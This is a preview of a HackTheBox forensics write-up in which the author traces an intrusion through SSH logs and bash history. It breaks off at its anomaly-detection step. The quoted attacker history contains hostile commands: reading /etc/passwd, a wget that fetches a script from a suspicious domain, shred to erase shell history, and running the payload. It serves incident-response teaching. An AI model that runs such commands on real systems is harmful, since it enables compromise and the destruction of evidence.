forensicsfreeeasy

An unusual sighting

hackthebox

This forensics challenge required analyzing SSH logs and bash history to identify a security incident on a development server. The task was to detect signs of unauthorized access, trace the attacker's activities, and extract the flag from the evidence.

$ ls tags/ techniques/
sshlog-analysisbash-historyincident-responseattacker-identification
log-correlationtimeline-analysisbehavioral-analysis

$ cat /etc/rate-limit

Rate limit reached (20 reads/hour per IP). Showing preview only — full content returns at the next hour roll-over.

An unusual sighting — HackTheBox

Overview

This forensics challenge required analyzing SSH logs and bash history to identify a security incident on a development server. The task was to detect signs of unauthorized access, trace the attacker's activities, and extract the flag from the evidence.

The investigation centered on a compromised development server that was accessed from an unusual external IP address during non-business hours, followed by typical post-exploitation activities including system reconnaissance, payload delivery, and evidence destruction.

Solution

Step 1: SSH Log Analysis

The primary evidence files were SSH authentication logs (auth.log) and bash command history (.bash_history). Initial examination of the SSH logs revealed a successful login from an unexpected external source:

Feb 19 04:00:14 server sshd[12345]: Accepted publickey for devuser from 2.67.182.119 port 62221 ssh2

Key findings from log analysis:

  • Attacker IP: 2.67.182.119 (external, non-corporate address)
  • Target SSH server: 100.107.36.130:2221 (non-standard port)
  • Attack timestamp: 2024-02-19 04:00:14 (4 AM — outside work hours)
  • Authentication method: Public key (no password required)
  • Attacker SSH key fingerprint: OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4

Step 2: Bash History Analysis

Examining the user's bash history revealed a clear sequence of post-exploitation activities:

whoami                                    # Confirm user context
uname -a                                  # System reconnaissance
cat /etc/passwd                            # User enumeration
wget http://gnu-packages.com/setup.sh      # Payload download from suspicious domain
shred -u ~/.bash_history                   # Evidence destruction
./setup                                    # Execute malware

The commands demonstrate a classic attack lifecycle:

  1. Reconnaissance: Basic system information gathering
  2. User enumeration: Identifying system users via /etc/passwd
  3. Initial access: Downloading a malicious script from gnu-packages.com
  4. Covering tracks: Using shred to destroy bash history evidence
  5. Persistence/execution: Running the downloaded malware with ./setup

Step 3: Anomaly Detection

Several red flags were identified:

...

$ grep --similar

Similar writeups